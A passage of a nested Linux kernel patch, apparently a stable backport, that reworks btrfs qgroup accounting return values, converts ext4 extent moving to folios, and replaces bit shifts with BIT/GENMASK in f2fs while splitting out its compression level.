+ 	btrfs_delalloc_release_metadata(inode, disk_num_bytes, ret < 0);
+ out_qgroup_free_data:
+ 	if (ret < 0)
+-		btrfs_qgroup_free_data(inode, data_reserved, start, num_bytes);
++		btrfs_qgroup_free_data(inode, data_reserved, start, num_bytes, NULL);
+ out_free_data_space:
+ 	/*
+ 	 * If btrfs_reserve_extent() succeeded, then we already decremented
+diff --git a/fs/btrfs/ordered-data.c b/fs/btrfs/ordered-data.c
+index 0321753c16b9f..1b2af4785c0e2 100644
+--- a/fs/btrfs/ordered-data.c
++++ b/fs/btrfs/ordered-data.c
+@@ -172,11 +172,12 @@ int btrfs_add_ordered_extent(struct btrfs_inode *inode, u64 file_offset,
+ 	struct rb_node *node;
+ 	struct btrfs_ordered_extent *entry;
+ 	int ret;
++	u64 qgroup_rsv = 0;
+ 
+ 	if (flags &
+ 	    ((1 << BTRFS_ORDERED_NOCOW) | (1 << BTRFS_ORDERED_PREALLOC))) {
+ 		/* For nocow write, we can release the qgroup rsv right now */
+-		ret = btrfs_qgroup_free_data(inode, NULL, file_offset, num_bytes);
++		ret = btrfs_qgroup_free_data(inode, NULL, file_offset, num_bytes, &qgroup_rsv);
+ 		if (ret < 0)
+ 			return ret;
+ 		ret = 0;
+@@ -185,7 +186,7 @@ int btrfs_add_ordered_extent(struct btrfs_inode *inode, u64 file_offset,
+ 		 * The ordered extent has reserved qgroup space, release now
+ 		 * and pass the reserved number for qgroup_record to free.
+ 		 */
+-		ret = btrfs_qgroup_release_data(inode, file_offset, num_bytes);
++		ret = btrfs_qgroup_release_data(inode, file_offset, num_bytes, &qgroup_rsv);
+ 		if (ret < 0)
+ 			return ret;
+ 	}
+@@ -203,7 +204,7 @@ int btrfs_add_ordered_extent(struct btrfs_inode *inode, u64 file_offset,
+ 	entry->inode = igrab(&inode->vfs_inode);
+ 	entry->compress_type = compress_type;
+ 	entry->truncated_len = (u64)-1;
+-	entry->qgroup_rsv = ret;
++	entry->qgroup_rsv = qgroup_rsv;
+ 	entry->physical = (u64)-1;
+ 
+ 	ASSERT((flags & ~BTRFS_ORDERED_TYPE_FLAGS) == 0);
+diff --git a/fs/btrfs/ordered-data.h b/fs/btrfs/ordered-data.h
+index f59f2dbdb25ed..cc3ca4bb9bd54 100644
+--- a/fs/btrfs/ordered-data.h
++++ b/fs/btrfs/ordered-data.h
+@@ -20,7 +20,7 @@ struct btrfs_ordered_sum {
+ 	/*
+ 	 * this is the length in bytes covered by the sums array below.
+ 	 */
+-	int len;
++	u32 len;
+ 	struct list_head list;
+ 	/* last field is a variable length array of csums */
+ 	u8 sums[];
+diff --git a/fs/btrfs/qgroup.c b/fs/btrfs/qgroup.c
+index 26cabffd59710..96ec9ccc2ef61 100644
+--- a/fs/btrfs/qgroup.c
++++ b/fs/btrfs/qgroup.c
+@@ -3833,13 +3833,14 @@ int btrfs_qgroup_reserve_data(struct btrfs_inode *inode,
+ 
+ /* Free ranges specified by @reserved, normally in error path */
+ static int qgroup_free_reserved_data(struct btrfs_inode *inode,
+-			struct extent_changeset *reserved, u64 start, u64 len)
++				     struct extent_changeset *reserved,
++				     u64 start, u64 len, u64 *freed_ret)
+ {
+ 	struct btrfs_root *root = inode->root;
+ 	struct ulist_node *unode;
+ 	struct ulist_iterator uiter;
+ 	struct extent_changeset changeset;
+-	int freed = 0;
++	u64 freed = 0;
+ 	int ret;
+ 
+ 	extent_changeset_init(&changeset);
+@@ -3880,7 +3881,9 @@ static int qgroup_free_reserved_data(struct btrfs_inode *inode,
+ 	}
+ 	btrfs_qgroup_free_refroot(root->fs_info, root->root_key.objectid, freed,
+ 				  BTRFS_QGROUP_RSV_DATA);
+-	ret = freed;
++	if (freed_ret)
++		*freed_ret = freed;
++	ret = 0;
+ out:
+ 	extent_changeset_release(&changeset);
+ 	return ret;
+@@ -3888,7 +3891,7 @@ out:
+ 
+ static int __btrfs_qgroup_release_data(struct btrfs_inode *inode,
+ 			struct extent_changeset *reserved, u64 start, u64 len,
+-			int free)
++			u64 *released, int free)
+ {
+ 	struct extent_changeset changeset;
+ 	int trace_op = QGROUP_RELEASE;
+@@ -3900,7 +3903,7 @@ static int __btrfs_qgroup_release_data(struct btrfs_inode *inode,
+ 	/* In release case, we shouldn't have @reserved */
+ 	WARN_ON(!free && reserved);
+ 	if (free && reserved)
+-		return qgroup_free_reserved_data(inode, reserved, start, len);
++		return qgroup_free_reserved_data(inode, reserved, start, len, released);
+ 	extent_changeset_init(&changeset);
+ 	ret = clear_record_extent_bits(&inode->io_tree, start, start + len -1,
+ 				       EXTENT_QGROUP_RESERVED, &changeset);
+@@ -3915,7 +3918,8 @@ static int __btrfs_qgroup_release_data(struct btrfs_inode *inode,
+ 		btrfs_qgroup_free_refroot(inode->root->fs_info,
+ 				inode->root->root_key.objectid,
+ 				changeset.bytes_changed, BTRFS_QGROUP_RSV_DATA);
+-	ret = changeset.bytes_changed;
++	if (released)
++		*released = changeset.bytes_changed;
+ out:
+ 	extent_changeset_release(&changeset);
+ 	return ret;
+@@ -3934,9 +3938,10 @@ out:
+  * NOTE: This function may sleep for memory allocation.
+  */
+ int btrfs_qgroup_free_data(struct btrfs_inode *inode,
+-			struct extent_changeset *reserved, u64 start, u64 len)
++			   struct extent_changeset *reserved,
++			   u64 start, u64 len, u64 *freed)
+ {
+-	return __btrfs_qgroup_release_data(inode, reserved, start, len, 1);
++	return __btrfs_qgroup_release_data(inode, reserved, start, len, freed, 1);
+ }
+ 
+ /*
+@@ -3954,9 +3959,9 @@ int btrfs_qgroup_free_data(struct btrfs_inode *inode,
+  *
+  * NOTE: This function may sleep for memory allocation.
+  */
+-int btrfs_qgroup_release_data(struct btrfs_inode *inode, u64 start, u64 len)
++int btrfs_qgroup_release_data(struct btrfs_inode *inode, u64 start, u64 len, u64 *released)
+ {
+-	return __btrfs_qgroup_release_data(inode, NULL, start, len, 0);
++	return __btrfs_qgroup_release_data(inode, NULL, start, len, released, 0);
+ }
+ 
+ static void add_root_meta_rsv(struct btrfs_root *root, int num_bytes,
+diff --git a/fs/btrfs/qgroup.h b/fs/btrfs/qgroup.h
+index 578c77e94200f..c382923f7628e 100644
+--- a/fs/btrfs/qgroup.h
++++ b/fs/btrfs/qgroup.h
+@@ -360,10 +360,10 @@ int btrfs_verify_qgroup_counts(struct btrfs_fs_info *fs_info, u64 qgroupid,
+ /* New io_tree based accurate qgroup reserve API */
+ int btrfs_qgroup_reserve_data(struct btrfs_inode *inode,
+ 			struct extent_changeset **reserved, u64 start, u64 len);
+-int btrfs_qgroup_release_data(struct btrfs_inode *inode, u64 start, u64 len);
++int btrfs_qgroup_release_data(struct btrfs_inode *inode, u64 start, u64 len, u64 *released);
+ int btrfs_qgroup_free_data(struct btrfs_inode *inode,
+ 			   struct extent_changeset *reserved, u64 start,
+-			   u64 len);
++			   u64 len, u64 *freed);
+ int btrfs_qgroup_reserve_meta(struct btrfs_root *root, int num_bytes,
+ 			      enum btrfs_qgroup_rsv_type type, bool enforce);
+ int __btrfs_qgroup_reserve_meta(struct btrfs_root *root, int num_bytes,
+diff --git a/fs/cachefiles/namei.c b/fs/cachefiles/namei.c
+index 03ca8f2f657ab..50b2ee163af60 100644
+--- a/fs/cachefiles/namei.c
++++ b/fs/cachefiles/namei.c
+@@ -584,6 +584,8 @@ static bool cachefiles_open_file(struct cachefiles_object *object,
+ 	if (ret < 0)
+ 		goto check_failed;
+ 
++	clear_bit(FSCACHE_COOKIE_NO_DATA_TO_READ, &object->cookie->flags);
++
+ 	object->file = file;
+ 
+ 	/* Always update the atime on an object we've just looked up (this is
+diff --git a/fs/ceph/cache.c b/fs/ceph/cache.c
+index 177d8e8d73fe4..de1dee46d3df7 100644
+--- a/fs/ceph/cache.c
++++ b/fs/ceph/cache.c
+@@ -36,6 +36,8 @@ void ceph_fscache_register_inode_cookie(struct inode *inode)
+ 				       &ci->i_vino, sizeof(ci->i_vino),
+ 				       &ci->i_version, sizeof(ci->i_version),
+ 				       i_size_read(inode));
++	if (ci->netfs.cache)
++		mapping_set_release_always(inode->i_mapping);
+ }
+ 
+ void ceph_fscache_unregister_inode_cookie(struct ceph_inode_info *ci)
+diff --git a/fs/ext4/move_extent.c b/fs/ext4/move_extent.c
+index 044e34cd835c1..dedc9d445f243 100644
+--- a/fs/ext4/move_extent.c
++++ b/fs/ext4/move_extent.c
+@@ -253,6 +253,7 @@ move_extent_per_page(struct file *o_filp, struct inode *donor_inode,
+ {
+ 	struct inode *orig_inode = file_inode(o_filp);
+ 	struct page *pagep[2] = {NULL, NULL};
++	struct folio *folio[2] = {NULL, NULL};
+ 	handle_t *handle;
+ 	ext4_lblk_t orig_blk_offset, donor_blk_offset;
+ 	unsigned long blocksize = orig_inode->i_sb->s_blocksize;
+@@ -313,6 +314,13 @@ again:
+ 	 * hold page's lock, if it is still the case data copy is not
+ 	 * necessary, just swap data blocks between orig and donor.
+ 	 */
++	folio[0] = page_folio(pagep[0]);
++	folio[1] = page_folio(pagep[1]);
++
++	VM_BUG_ON_FOLIO(folio_test_large(folio[0]), folio[0]);
++	VM_BUG_ON_FOLIO(folio_test_large(folio[1]), folio[1]);
++	VM_BUG_ON_FOLIO(folio_nr_pages(folio[0]) != folio_nr_pages(folio[1]), folio[1]);
++
+ 	if (unwritten) {
+ 		ext4_double_down_write_data_sem(orig_inode, donor_inode);
+ 		/* If any of extents in range became initialized we have to
+@@ -331,10 +339,8 @@ again:
+ 			ext4_double_up_write_data_sem(orig_inode, donor_inode);
+ 			goto data_copy;
+ 		}
+-		if ((page_has_private(pagep[0]) &&
+-		     !try_to_release_page(pagep[0], 0)) ||
+-		    (page_has_private(pagep[1]) &&
+-		     !try_to_release_page(pagep[1], 0))) {
++		if (!filemap_release_folio(folio[0], 0) ||
++		    !filemap_release_folio(folio[1], 0)) {
+ 			*err = -EBUSY;
+ 			goto drop_data_sem;
+ 		}
+@@ -344,19 +350,19 @@ again:
+ 						   block_len_in_page, 1, err);
+ 	drop_data_sem:
+ 		ext4_double_up_write_data_sem(orig_inode, donor_inode);
+-		goto unlock_pages;
++		goto unlock_folios;
+ 	}
+ data_copy:
+-	*err = mext_page_mkuptodate(pagep[0], from, from + replaced_size);
++	*err = mext_page_mkuptodate(&folio[0]->page, from, from + replaced_size);
+ 	if (*err)
+-		goto unlock_pages;
++		goto unlock_folios;
+ 
+ 	/* At this point all buffers in range are uptodate, old mapping layout
+ 	 * is no longer required, try to drop it now. */
+-	if ((page_has_private(pagep[0]) && !try_to_release_page(pagep[0], 0)) ||
+-	    (page_has_private(pagep[1]) && !try_to_release_page(pagep[1], 0))) {
++	if (!filemap_release_folio(folio[0], 0) ||
++	    !filemap_release_folio(folio[1], 0)) {
+ 		*err = -EBUSY;
+-		goto unlock_pages;
++		goto unlock_folios;
+ 	}
+ 	ext4_double_down_write_data_sem(orig_inode, donor_inode);
+ 	replaced_count = ext4_swap_extents(handle, orig_inode, donor_inode,
+@@ -369,13 +375,13 @@ data_copy:
+ 			replaced_size =
+ 				block_len_in_page << orig_inode->i_blkbits;
+ 		} else
+-			goto unlock_pages;
++			goto unlock_folios;
+ 	}
+ 	/* Perform all necessary steps similar write_begin()/write_end()
+ 	 * but keeping in mind that i_size will not change */
+-	if (!page_has_buffers(pagep[0]))
+-		create_empty_buffers(pagep[0], 1 << orig_inode->i_blkbits, 0);
+-	bh = page_buffers(pagep[0]);
++	if (!folio_buffers(folio[0]))
++		create_empty_buffers(&folio[0]->page, 1 << orig_inode->i_blkbits, 0);
++	bh = folio_buffers(folio[0]);
+ 	for (i = 0; i < data_offset_in_page; i++)
+ 		bh = bh->b_this_page;
+ 	for (i = 0; i < block_len_in_page; i++) {
+@@ -385,7 +391,7 @@ data_copy:
+ 		bh = bh->b_this_page;
+ 	}
+ 	if (!*err)
+-		*err = block_commit_write(pagep[0], from, from + replaced_size);
++		*err = block_commit_write(&folio[0]->page, from, from + replaced_size);
+ 
+ 	if (unlikely(*err < 0))
+ 		goto repair_branches;
+@@ -395,11 +401,11 @@ data_copy:
+ 	*err = ext4_jbd2_inode_add_write(handle, orig_inode,
+ 			(loff_t)orig_page_offset << PAGE_SHIFT, replaced_size);
+ 
+-unlock_pages:
+-	unlock_page(pagep[0]);
+-	put_page(pagep[0]);
+-	unlock_page(pagep[1]);
+-	put_page(pagep[1]);
++unlock_folios:
++	folio_unlock(folio[0]);
++	folio_put(folio[0]);
++	folio_unlock(folio[1]);
++	folio_put(folio[1]);
+ stop_journal:
+ 	ext4_journal_stop(handle);
+ 	if (*err == -ENOSPC &&
+@@ -430,7 +436,7 @@ repair_branches:
+ 		*err = -EIO;
+ 	}
+ 	replaced_count = 0;
+-	goto unlock_pages;
++	goto unlock_folios;
+ }
+ 
+ /**
+diff --git a/fs/f2fs/checkpoint.c b/fs/f2fs/checkpoint.c
+index 5df04ed010cae..eb4d69f53337f 100644
+--- a/fs/f2fs/checkpoint.c
++++ b/fs/f2fs/checkpoint.c
+@@ -984,7 +984,7 @@ int f2fs_get_valid_checkpoint(struct f2fs_sb_info *sbi)
+ 
+ 	cp_blk_no = le32_to_cpu(fsb->cp_blkaddr);
+ 	if (cur_page == cp2)
+-		cp_blk_no += 1 << le32_to_cpu(fsb->log_blocks_per_seg);
++		cp_blk_no += BIT(le32_to_cpu(fsb->log_blocks_per_seg));
+ 
+ 	for (i = 1; i < cp_blks; i++) {
+ 		void *sit_bitmap_ptr;
+diff --git a/fs/f2fs/compress.c b/fs/f2fs/compress.c
+index 11d9dce994dbe..4cb58e8d699e2 100644
+--- a/fs/f2fs/compress.c
++++ b/fs/f2fs/compress.c
+@@ -241,7 +241,7 @@ static int lz4_init_compress_ctx(struct compress_ctx *cc)
+ 	unsigned int size = LZ4_MEM_COMPRESS;
+ 
+ #ifdef CONFIG_F2FS_FS_LZ4HC
+-	if (F2FS_I(cc->inode)->i_compress_flag >> COMPRESS_LEVEL_OFFSET)
++	if (F2FS_I(cc->inode)->i_compress_level)
+ 		size = LZ4HC_MEM_COMPRESS;
+ #endif
+ 
+@@ -267,8 +267,7 @@ static void lz4_destroy_compress_ctx(struct compress_ctx *cc)
+ #ifdef CONFIG_F2FS_FS_LZ4HC
+ static int lz4hc_compress_pages(struct compress_ctx *cc)
+ {
+-	unsigned char level = F2FS_I(cc->inode)->i_compress_flag >>
+-						COMPRESS_LEVEL_OFFSET;
++	unsigned char level = F2FS_I(cc->inode)->i_compress_level;
+ 	int len;
+ 
+ 	if (level)
+@@ -332,17 +331,15 @@ static const struct f2fs_compress_ops f2fs_lz4_ops = {
+ #endif
+ 
+ #ifdef CONFIG_F2FS_FS_ZSTD
+-#define F2FS_ZSTD_DEFAULT_CLEVEL	1
+-
+ static int zstd_init_compress_ctx(struct compress_ctx *cc)
+ {
+ 	zstd_parameters params;
+ 	zstd_cstream *stream;
+ 	void *workspace;
+ 	unsigned int workspace_size;
+-	unsigned char level = F2FS_I(cc->inode)->i_compress_flag >>
+-						COMPRESS_LEVEL_OFFSET;
++	unsigned char level = F2FS_I(cc->inode)->i_compress_level;
+ 
++	/* Need to remain this for backward compatibility */
+ 	if (!level)
+ 		level = F2FS_ZSTD_DEFAULT_CLEVEL;
+ 
+@@ -675,7 +672,7 @@ static int f2fs_compress_pages(struct compress_ctx *cc)
+ 
+ 	cc->cbuf->clen = cpu_to_le32(cc->clen);
+ 
+-	if (fi->i_compress_flag & 1 << COMPRESS_CHKSUM)
++	if (fi->i_compress_flag & BIT(COMPRESS_CHKSUM))
+ 		chksum = f2fs_crc32(F2FS_I_SB(cc->inode),
+ 					cc->cbuf->cdata, cc->clen);
+ 	cc->cbuf->chksum = cpu_to_le32(chksum);
+@@ -773,7 +770,7 @@ void f2fs_decompress_cluster(struct decompress_io_ctx *dic, bool in_task)
+ 
+ 	ret = cops->decompress_pages(dic);
+ 
+-	if (!ret && (fi->i_compress_flag & 1 << COMPRESS_CHKSUM)) {
++	if (!ret && (fi->i_compress_flag & BIT(COMPRESS_CHKSUM))) {
+ 		u32 provided = le32_to_cpu(dic->cbuf->chksum);
+ 		u32 calculated = f2fs_crc32(sbi, dic->cbuf->cdata, dic->clen);
+ 
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index ea05710ca9bdf..3666c1fd77a64 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -95,17 +95,17 @@ static enum count_type __read_io_type(struct page *page)
+ /* postprocessing steps for read bios */
+ enum bio_post_read_step {
+ #ifdef CONFIG_FS_ENCRYPTION
+-	STEP_DECRYPT	= 1 << 0,
++	STEP_DECRYPT	= BIT(0),
+ #else
+ 	STEP_DECRYPT	= 0,	/* compile out the decryption-related code */
+ #endif
+ #ifdef CONFIG_F2FS_FS_COMPRESSION
+-	STEP_DECOMPRESS	= 1 << 1,
++	STEP_DECOMPRESS	= BIT(1),
+ #else
+ 	STEP_DECOMPRESS	= 0,	/* compile out the decompression-related code */
+ #endif
+ #ifdef CONFIG_FS_VERITY
+-	STEP_VERITY	= 1 << 2,
++	STEP_VERITY	= BIT(2),
+ #else
+ 	STEP_VERITY	= 0,	/* compile out the verity-related code */
+ #endif
+@@ -409,7 +409,7 @@ int f2fs_target_device_index(struct f2fs_sb_info *sbi, block_t blkaddr)
+ 
+ static blk_opf_t f2fs_io_flags(struct f2fs_io_info *fio)
+ {
+-	unsigned int temp_mask = (1 << NR_TEMP_TYPE) - 1;
++	unsigned int temp_mask = GENMASK(NR_TEMP_TYPE - 1, 0);
+ 	unsigned int fua_flag, meta_flag, io_flag;
+ 	blk_opf_t op_flags = 0;
+ 
+@@ -431,9 +431,9 @@ static blk_opf_t f2fs_io_flags(struct f2fs_io_info *fio)
+ 	 *    5 |    4 |   3 |    2 |    1 |   0 |
+ 	 * Cold | Warm | Hot | Cold | Warm | Hot |
+ 	 */
+-	if ((1 << fio->temp) & meta_flag)
++	if (BIT(fio->temp) & meta_flag)
+ 		op_flags |= REQ_META;
+-	if ((1 << fio->temp) & fua_flag)
++	if (BIT(fio->temp) & fua_flag)
+ 		op_flags |= REQ_FUA;
+ 	return op_flags;
+ }
+diff --git a/fs/f2fs/dir.c b/fs/f2fs/dir.c
+index 8373eba3a1337..510736d2ae110 100644
+--- a/fs/f2fs/dir.c
++++ b/fs/f2fs/dir.c
+@@ -29,7 +29,7 @@ static unsigned long dir_blocks(struct inode *inode)
+ static unsigned int dir_buckets(unsigned int level, int dir_level)
+ {
+ 	if (level + dir_level < MAX_DIR_HASH_DEPTH / 2)
+-		return 1 << (level + dir_level);
++		return BIT(level + dir_level);
+ 	else
+ 		return MAX_DIR_BUCKETS;
+ }
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index f56abb39601ac..5c76ba764b71f 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -64,7 +64,7 @@ enum {
+ };
+ 
+ #ifdef CONFIG_F2FS_FAULT_INJECTION
+-#define F2FS_ALL_FAULT_TYPE		((1 << FAULT_MAX) - 1)
++#define F2FS_ALL_FAULT_TYPE		(GENMASK(FAULT_MAX - 1, 0))
+ 
+ struct f2fs_fault_info {
+ 	atomic_t inject_ops;
+@@ -73,7 +73,7 @@ struct f2fs_fault_info {
+ };
+ 
+ extern const char *f2fs_fault_name[FAULT_MAX];
+-#define IS_FAULT_SET(fi, type) ((fi)->inject_type & (1 << (type)))
++#define IS_FAULT_SET(fi, type) ((fi)->inject_type & BIT(type))
+ #endif
+ 
+ /*
+@@ -840,7 +840,7 @@ struct f2fs_inode_info {
+ 	unsigned char i_compress_algorithm;	/* algorithm type */
+ 	unsigned char i_log_cluster_size;	/* log of cluster size */
+ 	unsigned char i_compress_level;		/* compress level (lz4hc,zstd) */
+-	unsigned short i_compress_flag;		/* compress flag */
++	unsigned char i_compress_flag;		/* compress flag */
+ 	unsigned int i_cluster_size;		/* cluster size */
+ 
+ 	unsigned int atomic_write_cnt;
+@@ -1412,7 +1412,7 @@ static inline void set_page_private_##name(struct page *page) \
+ static inline void clear_page_private_##name(struct page *page) \
+ { \
+ 	clear_bit(PAGE_PRIVATE_##flagname, &page_private(page)); \
+-	if (page_private(page) == 1 << PAGE_PRIVATE_NOT_POINTER) { \
++	if (page_private(page) == BIT(PAGE_PRIVATE_NOT_POINTER)) { \
+ 		set_page_private(page, 0); \
+ 		if (PagePrivate(page)) { \
+ 			ClearPagePrivate(page); \
+@@ -1462,8 +1462,8 @@ static inline void set_page_private_data(struct page *page, unsigned long data)
+ 
+ static inline void clear_page_private_data(struct page *page)
+ {
+-	page_private(page) &= (1 << PAGE_PRIVATE_MAX) - 1;
+-	if (page_private(page) == 1 << PAGE_PRIVATE_NOT_POINTER) {
++	page_private(page) &= GENMASK(PAGE_PRIVATE_MAX - 1, 0);
++	if (page_private(page) == BIT(PAGE_PRIVATE_NOT_POINTER)) {
+ 		set_page_private(page, 0);
+ 		if (PagePrivate(page)) {
+ 			ClearPagePrivate(page);
+@@ -1501,6 +1501,8 @@ struct compress_data {
+ 
+ #define F2FS_COMPRESSED_PAGE_MAGIC	0xF5F2C000
+ 
++#define F2FS_ZSTD_DEFAULT_CLEVEL	1
++
+ #define	COMPRESS_LEVEL_OFFSET	8
+ 
+ /* compress context */
+@@ -2882,7 +2884,7 @@ static inline int f2fs_test_bit(unsigned int nr, char *addr)
+ 	int mask;
+ 
+ 	addr += (nr >> 3);
+-	mask = 1 << (7 - (nr & 0x07));
++	mask = BIT(7 - (nr & 0x07));
+ 	return mask & *addr;
+ }
+ 
+@@ -2891,7 +2893,7 @@ static inline void f2fs_set_bit(unsigned int nr, char *addr)
+ 	int mask;
+ 
+ 	addr += (nr >> 3);
+-	mask = 1 << (7 - (nr & 0x07));
++	mask = BIT(7 - (nr & 0x07));
+ 	*addr |= mask;
+ }
+ 
+@@ -2900,7 +2902,7 @@ static inline void f2fs_clear_bit(unsigned int nr, char *addr)
+ 	int mask;
+ 
+ 	addr += (nr >> 3);
+-	mask = 1 << (7 - (nr & 0x07));
++	mask = BIT(7 - (nr & 0x07));
+ 	*addr &= ~mask;
+ }
+ 
+@@ -2910,7 +2912,7 @@ static inline int f2fs_test_and_set_bit(unsigned int nr, char *addr)
+ 	int ret;
+ 
+ 	addr += (nr >> 3);
+-	mask = 1 << (7 - (nr & 0x07));
++	mask = BIT(7 - (nr & 0x07));
+ 	ret = mask & *addr;
+ 	*addr |= mask;
+ 	return ret;
+@@ -2922,7 +2924,7 @@ static inline int f2fs_test_and_clear_bit(unsigned int nr, char *addr)
+ 	int ret;
+ 
+ 	addr += (nr >> 3);
+-	mask = 1 << (7 - (nr & 0x07));
++	mask = BIT(7 - (nr & 0x07));
+ 	ret = mask & *addr;
+ 	*addr &= ~mask;
+ 	return ret;
+@@ -2933,7 +2935,7 @@ static inline void f2fs_change_bit(unsigned int nr, char *addr)
+ 	int mask;
+ 
+ 	addr += (nr >> 3);
+-	mask = 1 << (7 - (nr & 0x07));
++	mask = BIT(7 - (nr & 0x07));
+ 	*addr ^= mask;
+ }
+ 
+@@ -4333,15 +4335,14 @@ static inline int set_compress_context(struct inode *inode)
+ 			F2FS_OPTION(sbi).compress_log_size;
+ 	F2FS_I(inode)->i_compress_flag =
+ 			F2FS_OPTION(sbi).compress_chksum ?
+-				1 << COMPRESS_CHKSUM : 0;
++				BIT(COMPRESS_CHKSUM) : 0;
+ 	F2FS_I(inode)->i_cluster_size =
+-			1 << F2FS_I(inode)->i_log_cluster_size;
++			BIT(F2FS_I(inode)->i_log_cluster_size);
+ 	if ((F2FS_I(inode)->i_compress_algorithm == COMPRESS_LZ4 ||
+ 		F2FS_I(inode)->i_compress_algorithm == COMPRESS_ZSTD) &&
+ 			F2FS_OPTION(sbi).compress_level)
+-		F2FS_I(inode)->i_compress_flag |=
+-				F2FS_OPTION(sbi).compress_level <<
+-				COMPRESS_LEVEL_OFFSET;
++		F2FS_I(inode)->i_compress_level =
++				F2FS_OPTION(sbi).compress_level;
+ 	F2FS_I(inode)->i_flags |= F2FS_COMPR_FL;
+ 	set_inode_flag(inode, FI_COMPRESSED_FILE);
+ 	stat_inc_compr_inode(inode);
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index d0c17366ebf48..9b9fb3c57ec6c 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -3983,7 +3983,16 @@ static int f2fs_ioc_set_compress_option(struct file *filp, unsigned long arg)
+ 
+ 	F2FS_I(inode)->i_compress_algorithm = option.algorithm;
+ 	F2FS_I(inode)->i_log_cluster_size = option.log_cluster_size;
+-	F2FS_I(inode)->i_cluster_size = 1 << option.log_cluster_size;
++	F2FS_I(inode)->i_cluster_size = BIT(option.log_cluster_size);
++	/* Set default level */
++	if (F2FS_I(inode)->i_compress_algorithm == COMPRESS_ZSTD)
++		F2FS_I(inode)->i_compress_level = F2FS_ZSTD_DEFAULT_CLEVEL;
++	else
++		F2FS_I(inode)->i_compress_level = 0;
++	/* Adjust mount option level */
++	if (option.algorithm == F2FS_OPTION(sbi).compress_algorithm &&
++	    F2FS_OPTION(sbi).compress_level)
++		F2FS_I(inode)->i_compress_level = F2FS_OPTION(sbi).compress_level;
+ 	f2fs_mark_inode_dirty_sync(inode, true);
+ 
+ 	if (!f2fs_is_compress_backend_ready(inode))
+diff --git a/fs/f2fs/inode.c b/fs/f2fs/inode.c
+index 1fc7760499f10..0010579f17368 100644
+--- a/fs/f2fs/inode.c
++++ b/fs/f2fs/inode.c
+@@ -450,12 +450,18 @@ static int do_read_inode(struct inode *inode)
+ 					(fi->i_flags & F2FS_COMPR_FL)) {
+ 		if (F2FS_FITS_IN_INODE(ri, fi->i_extra_isize,
+ 					i_log_cluster_size)) {
++			unsigned short compress_flag;
++
+ 			atomic_set(&fi->i_compr_blocks,
+ 					le64_to_cpu(ri->i_compr_blocks));
+ 			fi->i_compress_algorithm = ri->i_compress_algorithm;
+ 			fi->i_log_cluster_size = ri->i_log_cluster_size;
+-			fi->i_compress_flag = le16_to_cpu(ri->i_compress_flag);
+-			fi->i_cluster_size = 1 << fi->i_log_cluster_size;
++			compress_flag = le16_to_cpu(ri->i_compress_flag);
++			fi->i_compress_level = compress_flag >>
++						COMPRESS_LEVEL_OFFSET;
++			fi->i_compress_flag = compress_flag &
++					GENMASK(COMPRESS_LEVEL_OFFSET - 1, 0);
++			fi->i_cluster_size = BIT(fi->i_log_cluster_size);
+ 			set_inode_flag(inode, FI_COMPRESSED_FILE);
+ 		}
+ 	}
+@@ -675,13 +681,17 @@ void f2fs_update_inode(struct inode *inode, struct page *node_page)
+ 		if (f2fs_sb_has_compression(F2FS_I_SB(inode)) &&
+ 			F2FS_FITS_IN_INODE(ri, F2FS_I(inode)->i_extra_isize,
+ 							i_log_cluster_size)) {
++			unsigned short compress_flag;
++
+ 			ri->i_compr_blocks =
+ 				cpu_to_le64(atomic_read(
+ 					&F2FS_I(inode)->i_compr_blocks));
+ 			ri->i_compress_algorithm =
+ 				F2FS_I(inode)->i_compress_algorithm;
+-			ri->i_compress_flag =
+-				cpu_to_le16(F2FS_I(inode)->i_compress_flag);
++			compress_flag = F2FS_I(inode)->i_compress_flag |
++				F2FS_I(inode)->i_compress_level <<
++						COMPRESS_LEVEL_OFFSET;
++			ri->i_compress_flag = cpu_to_le16(compress_flag);
+ 			ri->i_log_cluster_size =
+ 				F2FS_I(inode)->i_log_cluster_size;
+ 		}
+diff --git a/fs/f2fs/node.h b/fs/f2fs/node.h
+index 0aa48704c77a0..7068f3ac036a5 100644
+--- a/fs/f2fs/node.h
++++ b/fs/f2fs/node.h
+@@ -93,17 +93,15 @@ static inline void copy_node_info(struct node_info *dst,
+ static inline void set_nat_flag(struct nat_entry *ne,
+ 				unsigned int type, bool set)
+ {
+-	unsigned char mask = 0x01 << type;
+ 	if (set)
+-		ne->ni.flag |= mask;
++		ne->ni.flag |= BIT(type);
+ 	else
+-		ne->ni.flag &= ~mask;
++		ne->ni.flag &= ~BIT(type);
+ }
+ 
+ static inline bool get_nat_flag(struct nat_entry *ne, unsigned int type)
+ {
+-	unsigned char mask = 0x01 << type;
+-	return ne->ni.flag & mask;
++	return ne->ni.flag & BIT(type);
+ }
+ 
+ static inline void nat_reset_flag(struct nat_entry *ne)
+@@ -224,7 +222,7 @@ static inline pgoff_t next_nat_addr(struct f2fs_sb_info *sbi,
+ 	struct f2fs_nm_info *nm_i = NM_I(sbi);
+ 
+ 	block_addr -= nm_i->nat_blkaddr;
+-	block_addr ^= 1 << sbi->log_blocks_per_seg;
++	block_addr ^= BIT(sbi->log_blocks_per_seg);
+ 	return block_addr + nm_i->nat_blkaddr;
+ }
+ 
+@@ -394,7 +392,7 @@ static inline nid_t get_nid(struct page *p, int off, bool i)
+ static inline int is_node(struct page *page, int type)
+ {
+ 	struct f2fs_node *rn = F2FS_NODE(page);
+-	return le32_to_cpu(rn->footer.flag) & (1 << type);
++	return le32_to_cpu(rn->footer.flag) & BIT(type);
+ }
+ 
+ #define is_cold_node(page)	is_node(page, COLD_BIT_SHIFT)
+@@ -407,9 +405,9 @@ static inline void set_cold_node(struct page *page, bool is_dir)
+ 	unsigned int flag = le32_to_cpu(rn->footer.flag);
+ 
+ 	if (is_dir)
+-		flag &= ~(0x1 << COLD_BIT_SHIFT);
++		flag &= ~BIT(COLD_BIT_SHIFT);
+ 	else
+-		flag |= (0x1 << COLD_BIT_SHIFT);
++		flag |= BIT(COLD_BIT_SHIFT);
+ 	rn->footer.flag = cpu_to_le32(flag);
+ }
+ 
+@@ -418,9 +416,9 @@ static inline void set_mark(struct page *page, int mark, int type)
+ 	struct f2fs_node *rn = F2FS_NODE(page);
+ 	unsigned int flag = le32_to_cpu(rn->footer.flag);
+ 	if (mark)
